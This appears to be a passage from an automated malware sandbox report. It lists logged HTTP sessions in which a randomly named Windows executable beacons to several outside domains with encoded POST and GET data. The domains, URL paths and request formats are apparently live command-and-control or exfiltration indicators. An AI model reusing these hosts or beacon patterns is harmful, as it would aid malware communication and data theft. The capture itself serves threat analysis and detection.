4f 6d 38 6f 66 79 71 30 63 38 52 41 4a 31 61 34 39 2b 74 64 31 31 4e 4a [TRUNCATED]
                                                                                                                  Data Ascii: nV=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2n0SzjThQV4zAr1hUknBu+CC6flrGnVW+r9MxRMK2lYguXB13ETRZFaAM0UFk0UvYLnRJfZGzRDBx1d0+tCW4kQENfYVaO3ZmDeFywDSC3BLV1XWZa/8f42z3mDPyC5/JBOH8UPeniyK/vfVOvh8fUyusPKxI79k13S3crhF/LfsEhQGL1D6enF3PHXD+UkHV6Ch2KXstPrbKYhfsvlQPZrO1o3rQfzPyM1/fh4FhlVlqhmtajQmuvqYwMwp8VkAOHD5NkjG/RWgR/Om8ofyq0c8RAJ1a49+td11NJ/JAPY06hGd2TEM9fYCvcW9bLYtkElIkn0XkHgD6sOTvLOcyoek9A/uRxu2qwNW8es7PjPGdgT9NKNcvOxh9/5StgOu1ScbzLNMjrn4QFHrO9M8jRTzHVoOdbO/NXN4G8EkGpu4SZgTKAx4UVY4vydQJiTBOT5uVgOmTDiBrwP2lC2KzX2t3PwIWY4GR6cdA8jkcfQBWDMUXOB0AOKScG8PwdEhmQIhZCCJ48VTXBy4ZO2+Qu8aN9KlxNgwGfkjq2t3Ccypg3qNhYOKNCZALBYvYJvtNsngPShVVOFQL9ZqZLQuYs1+wmWC1urt5XB2z48oQlvpkzuTfgmMOWfR1PjWv1FjV2IlfG3UiDq6dQTxvb5J0vpK4uzayBvpRzRU9MfrJOM1K48e6MrAY+ynIt/ucL923nbiw1ydWsrlM8rJqneR44lpjqkFoDmCBbDsxZRHqUZkwoy/LFq42eCXO92P1M8yzbAGsCuVF03+JZ2ADf1wPZ9F/b8mKhI5t3oV457hOs6NpeqWT3N1dQMirMDqllx6Abg3y6t9QrAPwo5wFg18m0MDvwvr7o27ldyigfYbMm5XTBNJiFhUU6L+ohf1gHAc3FywfTL6ayKui2NXwHDqaF5pumEi97kBLGW8uopZlCs0pl7xEWeZGSk4fcV1O9+ZMMmg9kY0 [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:39:02.344259024 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:02 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                  Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                  Oct 8, 2024 15:39:02.344299078 CEST224INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                  Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15
                                                                                                                  Oct 8, 2024 15:39:02.344307899 CEST1236INData Raw: 50 a9 57 40 43 bd 08 4a 42 3a a8 b1 5e 54 cb a2 f1 54 a4 70 8d 1e 4a 83 99 c4 c9 f8 63 a8 c4 32 54 ca 2b c5 da 32 fe 4d 92 03 fc d1 7e b4 14 da 3e a1 0d b5 61 e8 04 c6 63 2f 54 aa ab 45 f1 3f 64 be a0 2e af 41 20 b5 a2 ba 56 9f 84 5e 77 1c 8b 70
                                                                                                                  Data Ascii: PW@CJB:^TTpJc2T+2M~>ac/TE?d.A V^wpjnOAo]:J2\tU(B$Uja.R&cVj<dVT2kck:n{'R`K]5Crq2i"h<xRU@C,kk54
                                                                                                                  Oct 8, 2024 15:39:02.344319105 CEST1236INData Raw: 64 7a 76 07 e8 94 19 e0 b3 a3 96 d4 c8 93 87 15 54 b2 8d 87 89 9e 66 7b db a8 2b 8b 15 46 29 0a 1b 99 aa b5 52 50 33 62 ed 6b ba 6e 30 2b 0a 67 46 e4 4d 59 01 35 7e b9 47 c8 b3 34 df 59 29 97 a7 a1 8d 74 ae ad f5 4c 6b 7f e3 51 cc ba a7 7a 01 13
                                                                                                                  Data Ascii: dzvTf{+F)RP3bkn0+gFMY5~G4Y)tLkQz],WW:Hq~4DHvP6I&wM5v2u^Q9W4GsyeFYPJ+g@.Tzb{OwicIADYozB0%>P!,?UI(/U}nk1kz`T
                                                                                                                  Oct 8, 2024 15:39:02.344330072 CEST1236INData Raw: f4 3e 9c 7d 70 f4 b3 e0 e0 83 5b ff 78 fd d6 db 1f 06 07 6f 06 07 ff 74 fb a7 5f dc 3a f8 f4 e6 1b 9f dc 7e ff c6 ed b7 de 69 e0 b6 ca 0e 39 38 86 36 f1 25 14 03 a1 07 5a b9 d9 89 88 4f 50 8f 6b 67 9a 8b 3b 6b 39 c6 a0 18 9d 16 0f 47 20 7e 47 12
                                                                                                                  Data Ascii: >}p[xot_:~i986%ZOPkg;k9G ~G0O'TudA2)7.7inlrIdpplXnZ>ER)ZVr]_ZeRQWUV[^4eu:H?~0D`\C,
                                                                                                                  Oct 8, 2024 15:39:02.344341993 CEST672INData Raw: c4 b4 c7 b4 fb 03 5f bc bc 81 e2 c3 9c d4 c7 b5 76 a3 eb 58 38 26 6d e4 6e fe ee 57 b7 3e 81 eb 79 2b 38 fc 49 70 f4 e3 e0 10 07 07 e4 c1 5e 44 74 76 fc a3 df 1f bf fc 76 0e 09 3a 5c 1f db c8 e5 90 a0 a3 f7 5d 20 cd c7 08 67 29 43 ac 56 1c 81 30
                                                                                                                  Data Ascii: _vX8&mnW>y+8Ip^Dtvv:\] g)CV0iwqHNe\b3Y\1wiy>{u28fXZi)v0+_c7_~/# KN+P =bSqfsl?a/R<kDLPVp,!d:aLtp
                                                                                                                  Oct 8, 2024 15:39:02.344573021 CEST886INData Raw: 7b 3a d7 04 84 eb 2c 54 17 a0 4e c8 2b 43 cb 26 f2 2a 42 52 66 e8 94 ac f8 df ca f5 32 8b a0 1d 8a cc 58 e9 56 99 eb 49 3a c2 6f b3 aa c3 e0 f8 d4 b2 f8 36 ab 9a 4c ae ff ff cd aa 86 5e 26 8c 43 c4 a1 4a fc 89 79 1e 5e 01 81 48 2e 1c c1 fd 07 45
                                                                                                                  Data Ascii: {:,TN+C&*BRf2XVI:o6L^&CJy^H.E?)xB}1&vklnnX#)VsTmGQWWZ_"g??qzjNHm}nj}l\J7rtKMW$[Xm5#k}<Z52U\X


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.549991183.181.83.131804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:03.989612103 CEST474OUTGET /ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.nakama2-sshl.xyz
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:39:04.846374035 CEST478INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:04 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  X-Redirect-By: WordPress
                                                                                                                  Location: http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.54999238.47.232.196804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:10.079406977 CEST712OUTPOST /ak5l/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.zz82x.top
                                                                                                                  Origin: http://www.zz82x.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.zz82x.top/ak5l/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 41 36 4d 74 5a 45 75 36 32 57 4a 6e 61 62 6a 4d 6f 31 31 71 77 48 30 2f 57 70 69 35 74 4e 70 4d 35 5a 70 39 31 6e 4d 42 62 70 77 55 6b 77 67 48 77 4f 36 68 38 39 55 4e 56 72 72 74 46 6e 51 42 68 4e 36 74 78 4d 34 51 58 31 6d 4f 79 49 51 38 31 56 49 59 74 52 48 64 6f 42 5a 6f 5a 67 75 4d 43 39 76 46 67 45 50 50 6d 67 74 69 39 41 54 34 78 30 45 35 4f 76 69 79 5a 4f 69 2f 67 2b 39 5a 49 38 37 42 6c 5a 4c 4b 59 32 6c 65 2f 6e 4b 66 46 4f 66 72 6f 7a 4d 51 79 63 68 75 74 6b 65 2b 44 57 59 45 72 58 69 73 6f 66 65 59 48 48 31 39 6a 6f 34 74 46 37 35 52 52 44 6f 3d
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxA6MtZEu62WJnabjMo11qwH0/Wpi5tNpM5Zp91nMBbpwUkwgHwO6h89UNVrrtFnQBhN6txM4QX1mOyIQ81VIYtRHdoBZoZguMC9vFgEPPmgti9AT4x0E5OviyZOi/g+9ZI87BlZLKY2le/nKfFOfrozMQychutke+DWYErXisofeYHH19jo4tF75RRDo=
                                                                                                                  Oct 8, 2024 15:39:11.019114017 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:10 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.54999338.47.232.196804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:12.623302937 CEST732OUTPOST /ak5l/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.zz82x.top
                                                                                                                  Origin: http://www.zz82x.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.zz82x.top/ak5l/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 4e 4d 34 34 5a 39 6e 57 4d 42 65 70 77 55 39 41 67 65 76 2b 36 71 38 39 59 46 56 75 54 74 46 6e 55 42 68 4d 4b 74 78 2f 67 66 55 46 6d 4d 37 6f 52 36 78 56 49 59 74 52 48 64 6f 42 39 43 5a 67 47 4d 43 4d 66 46 79 57 6e 4d 71 41 74 74 34 41 54 34 37 6b 45 39 4f 76 6a 56 5a 4c 44 59 67 38 31 5a 49 38 72 42 6c 4d 33 4a 43 6d 6c 59 7a 33 4b 4c 4d 4f 4f 2b 68 52 45 78 34 75 67 4b 77 46 69 66 47 67 31 75 78 31 71 45 37 2f 79 67 58 55 39 4b 79 59 5a 45 66 59 70 68 50 55 38 2f 4b 46 54 2b 33 70 42 48 49 44 66 4f 41 2f 51 4c 4d 76 31 47
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uNM44Z9nWMBepwU9Agev+6q89YFVuTtFnUBhMKtx/gfUFmM7oR6xVIYtRHdoB9CZgGMCMfFyWnMqAtt4AT47kE9OvjVZLDYg81ZI8rBlM3JCmlYz3KLMOO+hREx4ugKwFifGg1ux1qE7/ygXU9KyYZEfYphPU8/KFT+3pBHIDfOA/QLMv1G
                                                                                                                  Oct 8, 2024 15:39:13.569960117 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:13 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.54999438.47.232.196804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:15.170475006 CEST1749OUTPOST /ak5l/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.zz82x.top
                                                                                                                  Origin: http://www.zz82x.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.zz82x.top/ak5l/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 54 46 57 79 4e 4e 65 77 53 4d 6f 78 42 61 63 74 57 44 61 36 2b 57 49 56 52 37 6a 4d 68 56 30 74 77 48 34 2f 57 71 75 50 34 75 46 4d 34 4b 42 39 32 46 30 42 64 70 77 55 69 77 67 44 76 2b 36 37 38 39 51 2f 56 76 76 54 46 6c 63 42 75 4f 43 74 7a 4f 67 66 44 56 6d 4d 32 49 51 39 31 56 49 4a 74 52 58 5a 6f 42 74 43 5a 67 47 4d 43 50 33 46 78 45 50 4d 73 41 74 69 39 41 53 35 78 30 45 56 4f 76 72 76 5a 4c 50 69 67 74 56 5a 49 64 62 42 6d 2b 66 4a 4a 6d 6c 61 77 33 4c 4d 4d 4f 44 75 68 56 63 44 34 76 55 6b 77 43 4f 66 48 6b 41 59 68 46 33 63 2f 2b 61 48 62 6b 64 35 73 34 4a 31 61 4a 56 61 4b 44 55 6a 4c 57 48 78 32 5a 45 4b 4e 79 71 30 62 6f 73 4c 4d 70 63 42 76 33 68 6d 48 6d 58 58 72 67 2f 4c 79 39 4c 66 6d 69 46 2b 64 72 51 67 64 49 6b 66 6d 77 57 77 49 47 34 7a 57 50 35 35 35 36 62 35 31 56 66 78 42 70 6f 64 75 45 46 59 39 57 2b 58 4d 4d 52 6f 58 37 34 2f 59 59 67 34 6e 56 61 64 4c 6d 31 48 56 49 2f 4f 41 64 66 61 6f 31 63 6a 4c 6a 4c 51 43 30 69 6d 4c 67 75 7a 31 49 47 62 2f 37 36 5a 39 77 2f [TRUNCATED]
                                                                                                                  Data Ascii: nV=TFWyNNewSMoxBactWDa6+WIVR7jMhV0twH4/WquP4uFM4KB92F0BdpwUiwgDv+6789Q/VvvTFlcBuOCtzOgfDVmM2IQ91VIJtRXZoBtCZgGMCP3FxEPMsAti9AS5x0EVOvrvZLPigtVZIdbBm+fJJmlaw3LMMODuhVcD4vUkwCOfHkAYhF3c/+aHbkd5s4J1aJVaKDUjLWHx2ZEKNyq0bosLMpcBv3hmHmXXrg/Ly9LfmiF+drQgdIkfmwWwIG4zWP5556b51VfxBpoduEFY9W+XMMRoX74/YYg4nVadLm1HVI/OAdfao1cjLjLQC0imLguz1IGb/76Z9w/NG/K+09UTmFcfIUdyaIIM8VJrIUXkjYDKzNENLWM07/NY85FsLZjE2nXvU1LdXTfZoJYxKzWTB8gXqEebQMeHxL9wrhBBlfhvh4RYb7L0/ru9RHBGG6LpT6Vu6WnA3zAzQKcYMakHfznDXXEv4mhpb5WqqnwHUeWHCeD2TQyGaCqvR/P/6JjYRlY4cxjhepeGUQjGxnXjrxPU0EZ01pAz9nXnIdWmiJyl1b5u6YpqFkEwuay07/K4gfdZ0JI4bcp1h8QF9TItS7vU4/emDhoeArxLY2KsQ2/BTe8yq0vz5qhqpcPiK/7suO4a6M0bd85FN5dAZSwWN3ydTi6vE76XOj3qPzk/ukpXxyMIi7cC3Y64zTyoojI3Du2AQUeGaCgHCwjV7rgJ7wzOD5Qu2eTOI2p6an+dPRN/L2W24yu3LaabO0zp3pqAgrICYMx5r8IuP3+adcKRQ/SloYCsEcp6cJvcPqzls2/7MY91bl/Eb33y/HKn8l7s/KUq9UExLj5yLCQrPKZYCfLPitWrHyUXMu0V+hCGXkqE7N9Zoc0p9MJVjYuq1ZAv/gbpN0loM2Zm0WUtXbO/jKF1CIiLeCwIWm0uw1HqUyqp6qpZkDPdto3S1ZITWysAQAt2f7fZO+q8nOwQQonmIUpivFeUdzgu9Py3tfRfINmqF [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:39:16.103693962 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:15 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.54999538.47.232.196804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:17.710258961 CEST467OUTGET /ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.zz82x.top
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:39:18.594732046 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:39:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.5499963.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:39:23.631701946 CEST721OUTPOST /b8ih/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.tukaari.shop
                                                                                                                  Origin: http://www.tukaari.shop
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.tukaari.shop/b8ih/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 44 66 62 59 39 7a 6f 46 55 4b 30 6f 33 69 77 37 2f 64 63 70 65 66 53 6f 75 33 71 36 32 56 44 65 44 4d 30 4a 31 4b 76 6c 33 64 47 78 71 50 4b 4d 61 61 4c 38 36 6b 2f 51 51 63 34 66 39 6a 4a 75 61 44 6e 46 35 41 78 65 76 67 6c 72 52 76 63 56 51 6e 47 55 2b 6a 66 33 42 4f 36 49 70 58 35 57 57 51 4f 2b 30 2f 67 72 39 39 5a 70 70 6e 4b 4d 41 45 7a 56 4e 67 4f 4e 71 33 4d 37 61 50 4e 74 44 36 59 6e 61 66 31 5a 5a 36 36 4d 49 70 78 45 62 7a 4b 37 45 42 61 73 73 34 51 6d 43 4a 76 6c 63 4c 74 4b 58 48 56 72 45 48 51 37 6f 36 57 44 4c 5a 62 38 65 46 57 30 62 46 6c 56 65 4a 5a 7a 45 72 37 47 34 50 51 3d
                                                                                                                  Data Ascii: nV=DfbY9zoFUK0o3iw7/dcpefSou3q62VDeDM0J1Kvl3dGxqPKMaaL86k/QQc4f9jJuaDnF5AxevglrRvcVQnGU+jf3BO6IpX5WWQO+0/gr99ZppnKMAEzVNgONq3M7aPNtD6Ynaf1ZZ66MIpxEbzK7EBass4QmCJvlcLtKXHVrEHQ7o6WDLZb8eFW0bFlVeJZzEr7G4PQ=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.5499973.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
